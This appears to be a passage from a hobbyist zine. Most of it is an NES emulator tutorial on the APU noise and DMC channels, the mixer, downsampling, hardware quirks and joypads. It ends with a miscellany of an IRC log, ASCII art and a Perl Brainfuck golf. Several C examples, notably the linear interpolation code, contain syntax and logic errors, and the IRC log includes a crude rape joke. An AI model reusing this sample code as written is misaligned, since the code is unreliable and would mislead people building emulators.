void noise_run()
{
if (!--noise_timer_period)
{
noise_shift_reg &= 0x7FFF;
if (reg[0x0E] & 0x80) //loop flg set
noise_shift_reg |= (((noise_shift_reg & 0x01) ^
((noise_shift_reg & 0x40) >> 6)) << 15);
else
noise_shift_reg |= (((noise_shift_reg & 0x01) ^
((noise_shift_reg & 0x02) >> 1)) << 15);
noise_shift_reg >>= 1;
//reload, if timer period was change it is reloaded here
//not immediately in the timer period set reg
noise_timer_period = noise_period_table[*region][reg[0x0E] & 0xF];
}
if (!(noise_shift_reg & 1) && noise_len_cnt)
{
if (envelope_is_constant)
noise_sample = envelope_parameter_set_in_0x400C;
else
noise_sample = noise_envelope_cnt;
}
else
noise_sample = 0;
}
==========================================================================

++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++

++++++++++++++++++++++DMC Channel+++++++++++++++++++++++++++++++++++++++++

The DMC unit can be described by a diagram here
(taken from nesdevwiki, thanks!)

Timer
|
v
Reader ---> Buffer ---> Output ---> Counter ---> (to mixer)

The DMC is able to read bytes from the ROM space to output
DPCM based samples. It loads data into it's internal
sample buffer. The sample buffer is either holding
a 1 byte (8 bit) sample in the sample buffer, or is empty.
The sample buffer can only be emptied by the Output unit
in the diagram above.

When the sample buffer is emptied by the Output unit,
the Reader fills the sample buffer with the next byte
from the currently playing sample using the address
specified in 0x4012. When a sample is (re)started,
the sample address is set to the address specified
in 0x4012, Sample address = %11AAAAAA.AA000000,
and the sample length is set to the value inside
0x4013, Sample length = %LLLL.LLLL0001.
The reader does its work whenever the sample buffer is empty,

1) The sample buffer is filled with the next sample byte read from the
current address, subject to whatever mapping hardware is present.
The CPU is suspend for four clock cycles.

2) The address is incremented; if it exceeds $FFFF, it is wrapped around
to $8000.
* The bytes remaining counter is decremented; if it becomes zero and
the loop flag is set, the sample is restarted (see above),
otherwise if the bytes remaining counter becomes zero and the
IRQ enabled flag is set, the interrupt flag is set.

Here is a possible explanation as to why the CPU is suspended for 4 clock
cycles during the memory read:

==========================================================================

Likely internal implementation of the read

The following is speculation, and thus not necessarily 100% accurate.
It does accurately predict observed behavior.

The 6502 cannot be pulled off of the bus normally. The 2A03 DMC gets
around this by pulling RDY low internally. This causes the CPU to pause
during the next read cycle, until RDY goes high again. The DMC unit
holds RDY low for 4 cycles. The first three cycles it idles,
as the CPU could have just started an interrupt cycle,
and thus be writing for 3 consecutive cycles (and thus ignoring RDY).
On the fourth cycle, the DMC unit drives the next sample address onto
the address lines, and reads that byte from memory. It then drives
RDY high again, and the CPU picks up where it left off.

==========================================================================

This leads to some side effects when the CPU is reading some registers
such as the 0x4016 (joypad) or the PPU registers when this happens,
the joypad and the PPU will see some extra reads, leading to some
undesired behavior, such as multiple PPUREG6 increments when reading
0x2007, or the joypad bit gets shifted out.

============Code example of what happens==================================
u8 rd(int addr) //per cycle accurate code, so we check for DMC delay here
{
if (apu.dmc_get_mem_dma) //this is the 4 cycle delay
{
if ((addr == 0x4016) || (addr == 0x4017))
{
run_cyc(); //1st cycle
//if this is the joypad registers, it sees it as
//1 extra read.
(this->*p_read[addr>>12])(addr);
--apu.dmc_get_mem_dma;
while (--apu.dmc_get_mem_dma) //other 3 cycles
run_cyc();
}
else
{
//for other registers,
//it sees it as *MULTIPLE READS*
//IE, the 0x2007 register sees
//4 reads, and increments the 0x2006
//4 times!
while (--apu.dmc_get_mem_dma)
{
run_cyc();
(this->*p_read[addr>>12])(addr);
}
}
//get sample byte
apu.dmc_sample_buf = read(apu.dmc_sample_addr);
//if sample addr exceeds $FFFF
//wrapped around to $8000
if (++apu.dmc_sample_addr & 0x10000)
apu.dmc_sample_addr = 0x8000;
if (!--apu.dmc_byte_rem)
{
if (apu.reg[0x10] & 0x40) //loop flg set
{
//sample restarted
apu.dmc_sample_addr = (apu.reg[0x12] << 6)|0xC000;
apu.dmc_byte_rem = (apu.reg[0x13] << 4) | 1;
}
else if (apu.reg[0x10] & 0x80)
{
//if irq enable flg is set
//the dmc interrupt flg get set and irq get set
cpu.irq |= DMC_IRQ_FLG;
}
}
apu.dmc_sample_buf_full = true;
//read as normal code here...
}
void wr(int addr, u8 data)
{
//as for writes the CPU generally
//write once, and then goes back into memory read mode,
//so just subtract one cycle from the 4 cycle get
//and write normally...
if (apu.dmc_get_dmc_dma)
--apu.dmc_get_dmc_dma;
//normal write code...
}
==========================================================================

As for the output unit, it continuously outputs a 7 bit value to
the mixer, when an output cycle ends, a new cycle is started as follow:

1) The bits-remaining counter is loaded with 8

2) If the sample buffer is empty, the silence flag is set,
otherwise the silence flag is cleared and the sample buffer is emptied
into the shift register.

The timer reload value is set by bit 0 to 3 in register
0x4010, where that value is an index to a lookup table
that is the reload value. Here is the rate table:

Rate: 0x00 0x01 0x02 0x03 0x04 0x05 0x06 0x07 0x08 0x09
0x0A 0x0B 0x0C 0x0D 0x0E 0x0F
------------------------------------------------------------
NTSC: 428, 380, 340, 320, 286, 254, 226, 214, 190,
160, 142, 128, 106, 84, 72, 54
PAL: 398, 354, 316, 298, 276, 236, 210, 198, 176,
148, 132, 118, 98, 78, 66, 50

When the timer outputs a clock, the following actions occur in order:

1. If the silence flag is clear, bit 0 of the shift register is applied
to the counter as follows: If bit 0 is clear and the delta-counter
is greater than 1, the counter is decremented by 2, otherwise if
bit 0 is set and the delta-counter is less than 126, the counter
is incremented by 2.
2. The right shift register is clocked.
3. The bits-remaining counter is decremented. If it becomes zero, a
new cycle is started.

Nothing can interrupt a cycle; every cycle runs to completion before a
new cycle is started.

Here is example code of how the DMC is ran

========Example code for DMC unit=========================================

void dmc_run()
{
if (!--timer_period[4]) //output clock
{
timer_period[4] = dmc_rate_table[*region][reg[0x10] & 0xF];
if (dmc_play_flg) //silence flg cleared, playing a sample
{
//bit 0 of shift reg is applied to counter as follows
//if bit 0 is clear and delta counter is greater than 1
//counter is decremented by 2 otherwise if bit 0 is
//set and delta counter is less than 126 counter is
//incremented by 2

//delta counter is the $4011, or known as
//the output of the DMC, thanks nintendulator
if (dmc_shift_reg & 1)
{
if (dmc_cnt < 126)
dmc_cnt += 2;
}
else if (dmc_cnt > 1)
dmc_cnt -= 2;
update_channel(DMC);
}
dmc_shift_reg >>= 1; //right shift reg is clocked
if (!--dmc_bit_rem) //if bits remaining counter is 0 new cycle
//starts
{
dmc_bit_rem = 8; //reload
//when sample buffer is emptied by output unit
//memory reloaded if dmc byte remains
//if we do it this way, the sample won't be played
//until the *NEXT* output cycle, since the shift register
//will load the new one the next cycle
//from all the docs i read, it seems that
//the output unit shift the sample byte into
//shift register when output cycle is reloaded
//im guessing the shift register, so the 4
//cycle delay in getting the sample won't get
//loaded in until the next output cycle, *shrugs*
//not sure if this is right
if (dmc_sample_buf_full && dmc_byte_rem)
{
dmc_play_flg = true;
dmc_get_mem_dma= 5; //4 cycle delay
dmc_sample_buf_full = false;
dmc_shift_reg = dmc_sample_buf;
}
//no byte remain, so sample buf not reloaded,
//silence flg set
else
dmc_play_flg = false;
}
}
}
==========================================================================

The mixer recieves the value of the DMC counter, the DMC counter is
loaded with 0 on start up. The DMC counter is directly
set through 0x4011.

++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++

++++++++++++++++++++++The APU Mixer+++++++++++++++++++++++++++++++++++++++

The sample we gotten from all the units so far is sent to the
mixer, here is how the mixer mixes the sound:

Pulse wave 1 and pulse wave 2 outputs a value from 0 to 15.
(envelope parameter) Triangle can output a value between 0 and 15.
Noise can output a value from 0 to 15 (envelope parameter)
DMC can output a value from 0 to 127, here is how the the values
relate to each other in the mixer.

n is a value that goes from 0 to 30 of size 31.
output = pulse_out + tnd_out
pulse_table [n] = 95.52 / (8128.0 / n + 100)
//we can see here why n is of size 31,
//because the pulse 1 and pulse 2 takes on the values
//of 15, counting 0.
pulse_out = pulse_table [pulse1 + pulse2]

The tnd_out table is approximated (within 4%) by using a
base unit close to the DMC's DAC.

As for the triangle/noise/DMC
n is 0 to 202 of size 203.
tnd_table [n] = 163.67 / (24329.0 / n + 100)
//as you can see, the DMC can change the volume
//of the triangle and noise.
tnd_out = tnd_table [3 * triangle + 2 * noise + dmc]

Here is a linear approximation of the output
pulse_out = 0.00752 * (pulse1 + pulse2)
tnd_out = 0.00851 * triangle + 0.00494 * noise + 0.00335 * dmc

Finally the output is gotten using output = pulse_out + tnd_out.

The values are normalized, so the values are from 0.0 to 1.0, you
need to rescale for your sound API.

==========================================================================

++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++

++++++++++++++++Downsampling++++++++++++++++++++++++++++++++++++++++++++++

Since the APU runs the same speed as the NES CPU, it samples
~1789772 samples a second, while a modern sound card can only sample
around 44100 samples to 48000 samples, we need to downsample the data.
There are many methods that downsamples well to give a decent quality.
I'll cover the ones that is most commonly used in emulation.

The NES can generate over 20 kHz frequency range, but the
human hearing range is around 20 Hz to 20 kHz, so we really don't
need any frequency over 20 kHz, and the nyquist sampling theorem
tells us that you can reconstruct a signal perfectly when you have
twice the amount of sampling rate, thus we theoretically can
sample at 40 KHz to cover all the frequency audible by the
human hearing range. Sound cards commonly uses 44.1/48 KHz
because the extra range gives low pass filters/high pass filters
some leeway to work well. To sum up, we really only need to downsample
to whatever the sound card can handle. We however need to discard
any frequencies above the nyquist limit, so we don't produce aliasing,
when a higher frequency waveform gets sampled as into lower frequency
waveform, because the sampling rate is too low (this is bad, as the
sound would sound wrong.)

Nearest Neighbor Interpolation:
This is the simplest method you can use, this method
is basically taking the "nearest" sample that sums up
to the sampling rate you want. For example, the NTSC
CPU outputs 1789772 samples a second, while the PAL outputs
1662607 samples a second, and you want to downsample to 44100
Hz, all you need to do is SAMPLING_FREQUENCY/DOWNSAMPLE_RATE.
1789772/44100 = ~41 samples a second and
1662607/44100 = ~38 samples a second. This kind of interpolation
is not recommended at all, it discards much data that could
affect the wave, and it can produce aliasing.

============Code Example==================================================
/* lame NTSC example */
int counter, index;
void apu_run()
{
//get all the unit output and look it up in table...
output = pulse_out + tnd_out;
//it's a crappy method to begin with,
//why even bother with the fractional bit
if (++counter == 41)
{
counter = 0;
index = (index + 1) % index_size;
sound_buffer[index] = output;
//write to sound out using some sound api...
}
}
==========================================================================

Linear Interpolation:
This method does a simple average of the samples and outputs
it to the buffer, it is a popular form of interpolation for emulation,
without too much speed lost. The idea is to accumulate up all
the samples up to 40/41 samples, and then divide them by 40 or 41
(NTSC). Linear interpolation works well for the NES, because
the wave output doesn't change very often, though with simple averaging,
a couple of outliers can effect the average alot.
Although linear interpolation doesn't prevent
aliasing, because it doesn't filter the higher frequencies out.

===========Code Example===========================================
/* lame NTSC example */
int tmp[41], tmp_index, index;
double c = 0.0;
void apu_run()
{
int sample;

//get all the unit output...
out = pulse_out + tnd_out;
tmp[tmp_index++] = out;
if (tmp_index == 41)
{
double fract = 1789772.0/44100; //get the fractional value;
fract = fract - floor(fract) + c;
if ((fract - 1.0) < 0.00001)
fract -= 1.0;
tmp_index[40] = tmp[39] * fract + (1.0-fract) * tmp[40];
//handle fract value

/* we keep this fractional part for the next output,
since the fractional part do get added,
like 18.10 + 18.10... will reach a whole
number when .10 is added 10 times. */

c = fract;

for (int i = 0, i != 41; ++i)
{
sample += tmp_index[i];
}
sample /= 41;
sound_buffer[index] = sample;
index = (index + 1) % index_size;
}
/* write samples out to some sound api... */
}
==========================================================================

Band Limited Synthesis:
Thanks to blargg for coming up with this method, and Disch for
explaining it to me. The idea here behind this is to instead take the
average every X samples and instead make a buffer that stores the
difference of the wave form and write to the buffer when it is changing
(When the volume is changed, or when the frequency is changed).
This method requires a time index to access when the change took place,
and then stores the difference of the new_output - old_output to say how
much of the wave has changed (if you did this to every index to where
it say it changed, then what you have is at the start, you add up all
the change with the old buffer to get the contents of the new buffer.
When you add the to the new buffer, you also add in the coefficients of a
sinc wave.
Blargg wrote about his method in http://slack.net/~ant/bl-synth/,

I'll cover here some stuff he didn't go into too specifically.

Here is a more clear example with code:

/* The index we will use is in a fixed point representation of where
it is where sample_rate is the sampling rate we want.
First of all we need to calculate transmult, this is done on
initialization time. Transmult is a constant that we will multiply
with to get it into fixed point representation that allows us to
figure out what the index number is of the buffer when we are adding
the deltas when the wave changes */


The equation we will use is sample_number = (timestamp * transmult) >>
audbits,
where audbits is the precision we want. The audbits is a constant we
decide to how much "fractional precision" and transmult is a number
we calculate to use at the beginning, it is a number we multiply
to transform the time index to sample index, covered later */

void calc_transmult(int *transmult, int sample_rate, double cpu_freq)
{
//the base equation is sample_number = (timestamp * transmult) >>
audbits,
//solve for transmult and get transmult = (sample_number / timestamp)
// << audbits

*transmult = sample_rate/cpu_freq * (1<<AUDBITS);
//example sample_rate is 44100 while NTSC CPU is 1789772, and we want
//16 bits of precision, we get 44100/1789772 * (1<<16) = ~1614 which
//we round.
}

/* next we need to generate a sinc wave with a fixed amount of samples
that we add to, the more samples of the sinc wave, the more it will
more sample points it will effect, its a good idea to have at least 12
samples, the more the better. We can generate a sinc wave either
from sin(pi*x)/(pi*x), or you can do something like
generate a square wave by adding a odd harmonic sin(x) + sin(3x)/3 ...
from and then storing the buffer of differences for 1 period,
and then having a another number = 1.0, for each delta you do
you subtract, then adding them in the middle of the buffer
at the end to get the 1.0 ratio (Which gives it a sinc looking
wave. You also need to have a phase shift on the wave moving left
and right to however many precision you think you need, and storing
those inside the buffer, the code is in blargg's example link to
generate it. A word of note is that the max harmonic for the
generated square you will use is half the sampling rate,
though after 1000 iterations the wave looks all the same, since
it affects so little since the divisor becomes so big. Having
around 64 or more of of the phase shift is good as covered in blargg's
tutorial. */


/* Next we need to hook our sound code for when the unit changes
volume we update the transition buffer */


===========Example================================================

void pulse_run()
{
if (!--pulse_timer)
{
//update the pulse sample
if (pulse_sample != old_pulse_sample)
update_trans_buf();
}
}
/* this is the same for all units, for envelope changes, sweep
length counter, etc.
you can handle it within the memory write functions */

void update_trans_buf()
{
int v;
int index;
//get the new output
//by combining all the samples and filling it
//with the correct value.
output = pulse_out + tnd_out - prev_out;

//we now multiply our timestamp (APU cycles in this case)
//the transition buffer is only 1 frame big so SAMPLE_RATE/60.0
//for NTSC buffer. IE, 44100/60 = 735.
{
//we are treating index as sample_number = (timestamp * transmult)
>> audbits,
//in this case.
index = apu.cycle * trans_mult;
//we figure out where exactly the fraction part lies.
fraction = index >> (audbits - FRACTIONAL_BITS) &
((1<<FRACTIONAL_BITS) - 1);
index >>= audbits;

fraction = index
//now that we have the index we can index the buffer.
//we add the wave samples we generate beforehand when
//adding this. assume we have 4 samples point of the
//wave we generated here
err = output;

buf[0] += (wave_table[fraction][0] * output);
err -= buf[0];
buf[1] += (wave_table[fraction][1] * output);
err -= buf[1];
buf[3] += (wave_table[fraction][3] * output);
err -= buf[3];
buf[4] += (wave_table[fraction][4] * output);
err -= buf[4];

b[2] += err; //the middle point gets the left over
//the wave is distributed, so all
//the output adds up to the original
//wave.
}
}

==========================================================================

There are other interpolation methods that is very good, such as
cubic interpolation, gaussian interpolation that you could check out.
Use google or a math book to find some more.

++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++

++++++++++++++++++++APU Quirks++++++++++++++++++++++++++++++++++++++++++++
Thanks to blargg for the testing these behaviors.

Clock jitter -
When the 0x4017 register gets written, the mode change
only occurs on even cycles, if it is on an odd cycle, it is delayed by
1 cycle. At power up, the APU is in a random even/odd execution.

============Code Example to handle this===================================

void apu_wr_reg17(struct sNES *nes, u8 data)
{
nes->apu.doirq = 1;
if (data & 0x40) //interrupt inhibit set or mode 1, frame flag cleared
{
nes->apu.doirq = 0;
nes->cpu.irq &= ~FRAME_IRQ_FLG;
}
//reset frame counter
if (nes->apu.cycle & 1)
nes->apu.frame_cnt = -2; //odd cycle, delayed by one cycle
else
nes->apu.frame_cnt = -1;
//if mode is 5, clocked in one cycle
nes->apu.frame_step = 0;
nes->apu.frame_mode = (data & 0x80) >> 7;
}

==========================================================================

0x4017 Write:
The NES pretends as if 0x4017 was written to just about 9 to 12
cycles before the instruction begins, this causes a delay in the APU
clocking the units like the frame counter when it begins.
(To implement this, just set your around apu.cycle = -9 and have the state
on startup to look like 0x4017 is set)

The Frame IRQ:
The frame IRQ when clocked by the frame sequencer is set 3 times in
a row. so game code that is near edge cases, make sure it is cleared if
one wanted it to be cleared.

The Length Counter:
Length counter halt flag is delayed by 1 cycle.
The length reload is ignored if it was written during length clocking
and length counter is non-zero before clocking.

++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++

--------------------------------------------------------------------------

VI. Miscellaneous

++++++++++++++++++++++++++Joypads+++++++++++++++++++++++++++++++++++++++++

The NES supports a variety of joypads, we'll just cover some commons
ones.

Here is the standard data stream for the 2 joypad registers,
thanks nesdevwiki for the diagram.

Addr 7654.3210 Function
$4016 (W) ----.---A Output data (strobe) to both controllers.
----.-CBA Output data to the expansion port.
$4016 (R) ---4.3--0 Read data from controller port #1.
---4.3210 Read data from expansion port.
$4017 (R) ---4.3--0 Read data from controller port #2.
---4.3210 Read data from expansion port.
[edit] Famicom
Addr 7654.3210 Function
$4016 (W) ----.---A Output strobe to both controllers.
----.-CBA Output data to the expansion port.
$4016 (R) ----.-M-0 Read data from controller #1 and microphone
state from controller #2
----.--1- Read data from expansion port.
$4017 (R) ----.---0 Read data from controller #2.
---4.3210 Read data from expansion port.

The standard NES joypad is read from address 0x4016 (1st controller
pad), and address 0x4017 (2nd controller pad).
Writing 1 (0 bit set) to 0x4016 records the state of the 2 controllers,
which buttons are set, writing 0 afterwards to either ports allow readback,
1 bit at a time in the 0th bit of address 0x4016 for controller 1, 0x4017
for controller 2. The first 8 reads returns the button in these order,
A, B, Select, Start, Up, Down, Left, Right, after the 8 reads,
the port will keep returning 1 (0 bit set) after every read,
until the game programmer resets it by writing 1 to the NES joypad
again. A Super Nintendo controller can be used on the NES, and it works
the same way, but the order of the buttons returned is
B, Y, Select, Start, Up, Down, Left, Right, A, X, L, R. 0x4016 and
0x4017 bit can be shifted by 1 by the DMC channel, documented above.
You should handle these the joypad events when 0x4016 gets written
to with 0th bit set. There is also one thing you need to take in account,
on a real controller, the up/down button and left/right button *CANNOT*
be used simutaneously, for an emulator this isn't a problem. You need
to filter the simutaneous press of up/down and left/right in your code,
only allowing up or down at one time, or left and right at one time.
Some games will assume that since you can't do that in the controller,
they wrote code that assumed that behavior, some games will break
if you don't implement the filtering of the button presses. Usually
the joypad returns that bit ORed with 0x40, because of open bus, so
when the game reads from 0x4016 or 0x4017 do return data | 0x40;

The NES Four Score and NES Satellite accessories allow four NES
controllers to be hooked up together. It works the same as the standard
controller, writing 1 to record the state of the controllers, and reading
back returns 1 bit (0th bit) of data at a time to see if which button is
pressed. Read 8 times in 0x4016 for all of the controller #1 data,
8 times again for controller #3, then read 8 times for the signature
0x10. Read 8 times in 0x4017 for the controller #2 data,
8 times for controller #4, and 8 more times to get the signature, 0x20.
Button status for each controller is returned in the
following order: A, B, Select, Start, Up, Down, Left, Right.
1 if pressed, 0 if not pressed. Controllers #3, #4, and the two signatures
are only sent when the Four Score switch is in the 4 player position.
When the switch is in the 2 player position those reads get the same
result as a normal controller, either 0x00 or 0xFF depending on the
controller.


The Zapper is a light gun that Nintendo sold for shooting games
such as Duck Hunt, the gun can be used in either port.
Bit 3 of register 0x4016 or 0x4017 reads back 1 if the light
sense is detected, 0 if it is not. The light sense is used to
see if the gun is pointed at the screen, it is up to the game programmer
to check this, you just need to set it to 1 (not detected, says the gun
is pointed at the screen) whenever some keyboard mapping you give the gun
gets hit. It also uses bit 4 for the trigger released or not, 1 if pulled,
0 is released.

++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++

+++++++++++++++++++++++Links++++++++++++++++++++++++++++++++++++++++++++++

http://nesdevwiki.org/
The latest up to date information about the NES, look
here to learn more about the NES, along with the hardware.

http://www.6502.org/tutorials/6502opcodes.html
This site shows all the official opcodes of the
6502 and their behaviors, a very nice resource for what implementing
the CPU opcodes.

http://www.viceteam.org/plain/64doc.txt
This shows what the CPU does per cycle when it
is accessing the opcodes, this is a must for anyone who
wants to get their timing properly.

http://nesdev.parodius.com/
The site where the original documents were stored,
note that some documents hosted there are outdated,
and found to be wrong now.

http://nesdev.parodius.com/bbs/
A great forum to talk about the NES, this is where the latest and
greatest hacks/discovery/discussion about the NES
takes place. It is a good place to learn about the NES hardware.

http://www.romhacking.net/docs/%5B362%5Dmapper_docs.zip
Disch compiled over 100 mappers documentation into 1 zip file,
for those who wants to be play more games, implementing mappers is a must.

http://www.qmtpro.com/~nes/nintendulator/
Nintendulator is an emulator made by Quietust, this emulator
is per cycle accurate code, with much more mappers supported not
documented in any documents. Give this a read to learn more about
the NES.

http://nestopia.sourceforge.net/
Nestopia is also a per cycle accurate code, with a very well
designed structure, give this a read to learn more about the NES too.

http://www.slack.net/~ant/nes-tests/
Blargg's test ROMs, they are designed to be used when writing
the emulator, his test ROMs cover a wide range of obscure behavior
of the PPU and APU, and even CPU timing. A must for anyone who is
writing a NES emulator.

http://www.qmtpro.com/~nes/misc/nestest.nes
http://www.qmtpro.com/~nes/misc/nestest.txt
This is a CPU rom test by Kevin Horton (kevtris), this is also
a good test rom for anyone who is writing a NES emulator.

++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++

+++++++++++++++++++++Summary++++++++++++++++++++++++++++++++++++++++++++++

To sum it all up, we'll describe how a normal game works. When the
cartridge PRG-ROM gets mapped to the memory space 0x8000 to 0xFFFF. The
address it jumps to begin decoding instruction is the RESET vector,
the game first thing it should do is disable all interrupts with SEI,
then it sets all the memory addresses it will use to 0, after which
it waits for the NES to enter VBLANK, where it will start writing tile
data or CHR data (if it uses CHR-RAM) for what to draw, then it enable
rendering, and off the NES goes to render the screen. The game main loop
is in, they can write to the music port to change the output, do
graphic updates and joypad reading during NMI. There are some games
that was written by people who knew the NES inside out, they write
to the graphics *during* rendering or take advantage to some cycle
behavior, or how the NES works, so you must take that into account
if you decide to write one.

++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++

VII. Thanks
Thanks to the Disch for proof reading this and for helping me when
I was writing the emulator, also to Vystrix_Nexoth for proof reading this.
To Quietust for making the emulator Nintendulator, which helped me
understand how the NES worked, blargg and kevtris for writing test ROMs,
and reversed engineered so much of the NES, the rest of the NESDEV
community for reverse engineering the NES/writing documents which
I learned so much from when I started, helpful comments, and the
NESDEV wiki that they contributed to, which I used as a reference
when I was writing this, and to the people who made 64doc.txt
for documenting per cycle operation code for the 6502.
Thanks for reading.

++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
--------------------------------------------------------------------------


[==============================================================================]
[-------------------------------[ /dev/random ]--------------------------------]
[==============================================================================]


<sam> but. yeah. y'know. i think you have to be fairly well circulated
<sam> before your institution will put up with that kinda shit :)
<rattle> I'M
<rattle> TOO SEXY FOR MY CAT
<rattle> TOO SEXY FOR MY CAT
<rattle> TOO SEXY FOR MY CAT
<rattle> TOO SEXY FOR MY CAT
<rattle> TOO SEXY FOR MY CAT
<rattle> TOO SEXY FOR MY CAT
<rattle> TOO SEXY FOR MY CAT
<sam> okay.
<rattle> yea.
* sam blinks
<rattle> sorry
<rattle> It's good now
<rattle> I'm good
* sam nods
<rattle> right said fred just got me
<sam> it's.. fair enough.
<sam> he does that from time to time
<sam> in his frightening 80's string vest
<rattle> yea
<sam> ...
<rattle> dude.
<rattle> I don't even OWN a cat.
<sam> you wouldn't STEAL a cat.
<rattle> you wouldn't go to the TOILET in the stolen cat!
<sam> EXACTLY.
<sam> but you would rape cats!
<rattle> but so would FRED.
<sam> "rape said fred"

_____ "RAPE."
| | /
|##-##|) /
Fred -----> | ( |' /
\ O /
|\___/|
___ ____/: :\____ ___
.' `.-===-\ /-===-.` '.
/ .-"""""-.-"""""-. \
/' =:= '\
.' ' .: o -=:=- o :. ' `.
(.' /'. '-.....-'-.....-' .'\ '.)
/' ._/ ". --:-- ." \_. '\
| .'| ". ---:--- ." |'. |
| : | | ---:--- | | : |
\ : | | . | | : /
\ ( | ' | ) \
\.\ | " | /./
(...\ / """
\ /...)
**** / """ \ ****
/ (__"
\ \
| / \ \ |
| / (.) |


====================================================== ]BRAINFUCK GOLF[ =====

#!/usr/bin/perl -0n
$i-=%h=qw/< ++$i > --$i + ++$$i - --$$i [ while($$i){
] } . print+chr$$i , $$i=getc/;s/./$h{$&};/g;eval


=============================================================================

http://wwwwwwwww.jodi.org/100cc/index.html

/\
/ \
/ \
_________________/______\_________________
| : ||: ~ ~ : |
| : ||: : |
| : ||: : |
| : ||: : |
| : ||: : |
| : ||: : |
| : ||: : |
| : ||: : |
| : ||: : |
| : ||: : |
| : ||: : |
| : ||: : |
| :______||:_____________________________: |
|/_______||/______________________________\|
\ ~\ | : |:| /
\ |\ | : |:| /
\ | \ | :__________|:| /
\ |:_\ | :__________\:| /
\ |___\ |______________| /
\ | \ |~ \ /
\|_______\|_________________\_/
|_____________________________|
/ \
/ \
/ \
/ _______________ \
/ ___/ \___ \
/____ __/ \__ ____\
|____/ \ ___|
/ __/ \__ \
/ / \ \
/ / ___________ \ \
/ / __/___________\__ \ \
/ /__ ___ /=================\ ___ __\ \
/ /___||___|====|[[[[[|||||||]]]]]|====|___||___\ \
/ / |=o=o=o=o=o=o=o=o=| \ \
.' / \_______ _______/ \ `.
: |___ |*| ___| :
.' | \_________________ |*| _________________/ | `.
: | ___________ ___ \ |*| / ___ ___________ | :
: |__/ \ / \_\\*//_/ \ / \__| :
: |______________:|:____:: **::****:|:********\_________:
.' /:|||||||||||||'`|;..:::::::::::..;|'`|||||||*|||||:\ `.
: \:|||||||||||' .:::;~|~~~___~~~|~;:::. `|||||*|||||:| :
: |:|||||||||' .::'\ ..:::::::::::.. /`::. `|||*|||||:| :
: |:|||||||' .::' .:::''~~ ~~``:::. `::. `|\***\|:| :
: |:|||||' .::\ .::''\ | | /``::: /::. `|||*|:| :
: |:|||| ::' .::' \|_________|/ `::: `::. `|* :| :
`. \:||' .::' ::'\ . . . /::: `::. *|:/ .'
: \:' :::'.::' \ . . / `::.`::: *:/ :
: | .::'.::'____\ . /____`::.`::.*| :
: | :::~::: | . . . | :::~:::*| :
: | ::: :: | . . ..:.. . . | :: :::*| :
: \ ::: :: | . : | :: :::*/ :
`. \`:: ::: ____| . . . |____ ::: ::'/ .'
: \:;~`::. / . . \ .::'~::/ :
`. \:. `::. / . . . \ .::' .:/ .'
: \:. `:::/ _________ \:::' .:/ :
`. \::. `:::. /| |\ .:::' .::/ .'
: ~~\:/ `:::./ | | \.:::' \:/~~ :
`:=========\::. `::::... ...::::' .::/=========:'
`: ~\::./ ```:::::::::''' \.::/~ :'
`. ~~~~~~\| ~~~ |/~~~~~~ .'
`. \:::...:::/ .'
`. ~~~~~~~~~ .'
`. .'
`:. .:'
`::. .::'
`::.. ..::'
`:::.. ..:::'
`::::::... ..::::::'
`:____:::::::::::____:'
```::::_____::::'''
~~~~~


_ _ _ _
_____ _____ _ _ _ _| |_| |_ (_)_ _ __ _ | |_ __ _ ___
/ -_) V / -_) '_| || | _| ' \| | ' \/ _` | | ' \/ _` (_-<
\___|\_/\___|_| \_, |\__|_||_|_|_||_\__, | |_||_\__,_/__/
_ _ |__/ _ |___/ _
(_) |_ ___ | |_(_)_ __ ___ __ _ _ _ __| |
| | _(_-< | _| | ' \/ -_)_ / _` | ' \/ _` |
|_|\__/__/ \__|_|_|_|_\___( ) \__,_|_||_\__,_|
_ _ _ |/ _ _
_____ _____ _ _ _ _| |_| |_ (_)_ _ __ _ __| (_)___ ___
/ -_) V / -_) '_| || | _| ' \| | ' \/ _` | / _` | / -_|_-<_
\___|\_/\___|_| \_, |\__|_||_|_|_||_\__, | \__,_|_\___/__(_)
|__/ |___/


__________ ___________ ____
=IZDD87,,,,,,,,,O7~,,,,,,,,,,,,,,,,,IOO
?7 7DDD~:,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,?8DDDDDD8O~
88,,,8DD:,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,+D8?
=8?,,,,8,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,OD,
D,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,ID+
O,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,+8
D,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,ND
D,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,~D
Z,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,8
D,,,,,,,,,,=:,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,D
Z8,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,N,,,,,,,,,,,,,,,,,,,,,D
,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,D
,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,:+,,,,,,,,,,,,,,,,,$
